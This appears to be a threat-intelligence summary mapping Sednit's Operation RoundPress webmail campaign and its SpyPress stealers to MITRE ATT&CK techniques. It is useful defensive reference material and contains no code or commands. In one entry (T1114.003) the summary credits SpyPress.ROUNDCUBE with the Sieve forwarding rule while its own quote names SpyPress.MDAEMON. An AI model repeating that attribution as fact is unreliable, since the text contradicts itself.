Operation RoundPress

MITRE Techniques

• [T1583.001] Acquire Infrastructure: Domains – Sednit purchased domains at various registrars to support their operations (‘Sednit bought domains at various registrars’).
• [T1583.004] Acquire Infrastructure: Server – Sednit rented servers at multiple hosting providers, including M247 (‘Sednit rented servers at M247 and other hosting providers’).
• [T1587.004] Develop Capabilities: Exploits – Sednit developed or acquired XSS exploits targeting Roundcube, Zimbra, Horde, and MDaemon (‘Sednit developed (or acquired) XSS exploits for Roundcube, Zimbra, Horde, and MDaemon’).
• [T1587.001] Develop Capabilities: Malware – Sednit developed JavaScript stealers SpyPress to harvest data from webmail servers (‘Sednit developed JavaScript stealers… to steal data from webmail servers’).
• [T1190] Exploit Public-Facing Application – Sednit exploited known and zero-day vulnerabilities in webmail software to execute malicious JavaScript (‘Sednit exploited known and zero-day vulnerabilities… to execute JavaScript code’).
• [T1203] Exploitation for Client Execution – SpyPress payloads execute when victims open malicious emails inside vulnerable webmail clients (‘SpyPress payloads are executed when a victim opens the malicious email’).
• [T1027] Obfuscated Files or Information – SpyPress payloads are obfuscated using an unknown JavaScript obfuscator (‘SpyPress payloads are obfuscated with an unknown JavaScript obfuscator’).
• [T1187] Forced Authentication – SpyPress payloads force victims to re-enter credentials by logging them out (‘SpyPress payloads can log out users to entice them into entering their credentials’).
• [T1556.006] Modify Authentication Process: Multi-Factor Authentication – SpyPress.MDAEMON steals 2FA secrets and creates app passwords for bypass (‘SpyPress.MDAEMON can steal the 2FA token and create an application password’).
• [T1087.003] Account Discovery: Email Account – SpyPress collects user contact lists and account information (‘SpyPress payloads get information about the email account, such as the contact list’).
• [T1056.003] Input Capture: Web Portal Capture – SpyPress attempts to steal credentials via hidden input forms (‘SpyPress payloads try to steal webmail credentials by creating a hidden login form’).
• [T1119] Automated Collection – SpyPress automates collection of credentials and emails (‘SpyPress payloads automatically collect credentials and email messages’).
• [T1114.002] Email Collection: Remote Email Collection – SpyPress collects and exfiltrates emails from victim mailboxes remotely (‘SpyPress payloads collect and exfiltrate emails…’).
• [T1114.003] Email Collection: Email Forwarding Rule – SpyPress.ROUNDCUBE creates Sieve rules to forward incoming emails to attackers (‘SpyPress.MDAEMON adds a Sieve rule to forward any incoming email message’).
• [T1071.001] Application Layer Protocol: Web Protocols – C2 communications are conducted using HTTPS (‘C&C communication is done via HTTPS’).
• [T1071.003] Application Layer Protocol: Mail Protocols – Email forwarding exfiltration uses mail protocols (‘exfiltration is done via email’).
• [T1132.001] Data Encoding: Standard Encoding – Data exfiltrated is base64 encoded (‘Data is base64 encoded before being sent to the C&C server’).
• [T1020] Automated Exfiltration – SpyPress automatically exfiltrates data to C2 servers (‘SpyPress payloads automatically exfiltrate credentials and email messages’).
• [T1041] Exfiltration Over C2 Channel – Data is exfiltrated over command and control channels (‘SpyPress payloads exfiltrate data over the C&C channel’).